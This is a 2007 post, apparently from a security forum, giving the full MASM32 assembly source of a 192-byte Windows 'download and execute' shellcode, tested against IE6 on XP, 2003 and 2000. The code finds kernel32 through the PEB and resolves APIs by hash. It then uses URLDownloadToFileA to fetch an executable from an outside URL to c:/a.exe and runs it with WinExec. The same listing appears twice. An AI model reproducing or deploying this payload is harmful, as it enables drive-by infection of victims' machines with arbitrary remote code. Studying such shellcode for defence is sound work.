Tiny Download&&Exec ShellCode
Author: czy
http://www.ph4nt0m.org
Date:2007-06-22
;Tiny Download
&&
Exec ShellCode codz czy
2007.6
.
1
;header 163 = 61 ( 16 + 8 + 9 + ( 28 )) + 95 ( 68 + 27 ) + 17
; 163 + 19 = 192
comment %
# -------------------------------------- # #
# Tiny Download && Exec ShellCode --> # #
# --> size 192 # #
# 2007.06 . 01 #
# codz: czy # #
# ------------------------------------------ # #
system :test on ie6 + XPSP2 / 2003SP2 / 2kSP4
%
. 586
.model flat,stdcall
option casemap:none
include c:/masm32/include/windows.inc
include c:/masm32/include/kernel32.inc
includelib c:/masm32/lib/kernel32.lib
include c:/masm32/include/user32.inc
includelib c:/masm32/lib/user32.lib
.data
shelldatabuffer db 1024 dup( 0 )
shellcodebuffer db 2046 dup( 0 )
downshell db ' down exploit ' , 0
txtname db ' c:/office/unicode.doc ' , 0
.code
start:
invoke MessageBoxA, 0 ,offset downshell,offset downshell, 1
invoke RtlMoveMemory,offset shellcodebuffer,00401040H, 256
mov eax,offset shellcodebuffer
jmp eax
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行,模拟真实的shellcode执行环境
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H ;要调用的API函数个数
jmp @@realshellcode
myExitProcess dd 073e2d87eh
myWinExec dd 00e8afe98h
myLoadLibraryA dd 0ec0e4e8eh
dll db ' URLMON ' , 0 , 0
myUrlDownFile dd 0702f1a36h
path db ' c:/a.exe ' , 0
url db ' http://www.masm32.net/a.exe ' , 0
@@realshellcode:
POP ECX
POP EDI
SCASD ;edi + 4
;得到kernel32.dll基地址
db 67h,64h,0A1h,30h,00h
mov eax, [eax + 0cH]
mov esi, [eax + 1cH]
lodsd
mov ebp, [eax + 08H] ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH ECX
@@next3:
MOV ESI,[EBP + 3Ch]
MOV ESI,[EBP + ESI + 78h]
ADD ESI,EBP
PUSH ESI
MOV ESI,[ESI + 20h]
ADD ESI,EBP
XOR ECX,ECX
DEC ECX
@@next:
INC ECX
LODSD
ADD EAX,EBP
XOR EBX,EBX
@@again:
MOVSX EDX,BYTE PTR [EAX]
CMP DL,DH
JZ @@end
ROR EBX,0Dh
ADD EBX,EDX
INC EAX
JMP @@again
@@end:
CMP EBX,[EDI]
JNZ @@next
POP ESI
MOV EBX,[ESI + 24h]
ADD EBX,EBP
MOV CX,WORD PTR [ECX * 2 + EBX]
MOV EBX,[ESI + 1Ch]
ADD EBX,EBP
MOV EAX,[ECX * 4 + EBX]
ADD EAX,EBP
STOSD
POP ECX
loop @@next2
mov ecx,[edi] ; 2
cmp cl, ' c ' ; 3
jz @@downfile ; 2
PUSH EDI
CALL EAX ; 2
xchg eax,ebp
scasd
scasd
push 01 ;2第二个DLL的函数个数
jmp @@next3 ; 2
;总计17
@@downfile:
push edx ; 0
push edx ; 0
push edi ;file = c:/a.exe
lea ecx, dword ptr [edi + 9h]
push ecx ;url
push edx ; 0
call eax ;URLDownloadToFileA, 0 ,url,file = c:/a.exe, 0 , 0
push 1 ;FOR TEST
push edi
call dword ptr [edi - 14H] ;winexec, ' c:/xxx.exe ' , 1
call dword ptr [edi - 18H] ;Exitprocess
somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
invoke ExitProcess, 0
end start
;header 163 = 61 ( 16 + 8 + 9 + ( 28 )) + 95 ( 68 + 27 ) + 17
; 163 + 19 = 192
comment %
# -------------------------------------- # #
# Tiny Download && Exec ShellCode --> # #
# --> size 192 # #
# 2007.06 . 01 #
# codz: czy # #
# ------------------------------------------ # #
system :test on ie6 + XPSP2 / 2003SP2 / 2kSP4
%
. 586
.model flat,stdcall
option casemap:none
include c:/masm32/include/windows.inc
include c:/masm32/include/kernel32.inc
includelib c:/masm32/lib/kernel32.lib
include c:/masm32/include/user32.inc
includelib c:/masm32/lib/user32.lib
.data
shelldatabuffer db 1024 dup( 0 )
shellcodebuffer db 2046 dup( 0 )
downshell db ' down exploit ' , 0
txtname db ' c:/office/unicode.doc ' , 0
.code
start:
invoke MessageBoxA, 0 ,offset downshell,offset downshell, 1
invoke RtlMoveMemory,offset shellcodebuffer,00401040H, 256
mov eax,offset shellcodebuffer
jmp eax
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行,模拟真实的shellcode执行环境
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H ;要调用的API函数个数
jmp @@realshellcode
myExitProcess dd 073e2d87eh
myWinExec dd 00e8afe98h
myLoadLibraryA dd 0ec0e4e8eh
dll db ' URLMON ' , 0 , 0
myUrlDownFile dd 0702f1a36h
path db ' c:/a.exe ' , 0
url db ' http://www.masm32.net/a.exe ' , 0
@@realshellcode:
POP ECX
POP EDI
SCASD ;edi + 4
;得到kernel32.dll基地址
db 67h,64h,0A1h,30h,00h
mov eax, [eax + 0cH]
mov esi, [eax + 1cH]
lodsd
mov ebp, [eax + 08H] ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH ECX
@@next3:
MOV ESI,[EBP + 3Ch]
MOV ESI,[EBP + ESI + 78h]
ADD ESI,EBP
PUSH ESI
MOV ESI,[ESI + 20h]
ADD ESI,EBP
XOR ECX,ECX
DEC ECX
@@next:
INC ECX
LODSD
ADD EAX,EBP
XOR EBX,EBX
@@again:
MOVSX EDX,BYTE PTR [EAX]
CMP DL,DH
JZ @@end
ROR EBX,0Dh
ADD EBX,EDX
INC EAX
JMP @@again
@@end:
CMP EBX,[EDI]
JNZ @@next
POP ESI
MOV EBX,[ESI + 24h]
ADD EBX,EBP
MOV CX,WORD PTR [ECX * 2 + EBX]
MOV EBX,[ESI + 1Ch]
ADD EBX,EBP
MOV EAX,[ECX * 4 + EBX]
ADD EAX,EBP
STOSD
POP ECX
loop @@next2
mov ecx,[edi] ; 2
cmp cl, ' c ' ; 3
jz @@downfile ; 2
PUSH EDI
CALL EAX ; 2
xchg eax,ebp
scasd
scasd
push 01 ;2第二个DLL的函数个数
jmp @@next3 ; 2
;总计17
@@downfile:
push edx ; 0
push edx ; 0
push edi ;file = c:/a.exe
lea ecx, dword ptr [edi + 9h]
push ecx ;url
push edx ; 0
call eax ;URLDownloadToFileA, 0 ,url,file = c:/a.exe, 0 , 0
push 1 ;FOR TEST
push edi
call dword ptr [edi - 14H] ;winexec, ' c:/xxx.exe ' , 1
call dword ptr [edi - 18H] ;Exitprocess
somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
invoke ExitProcess, 0
end start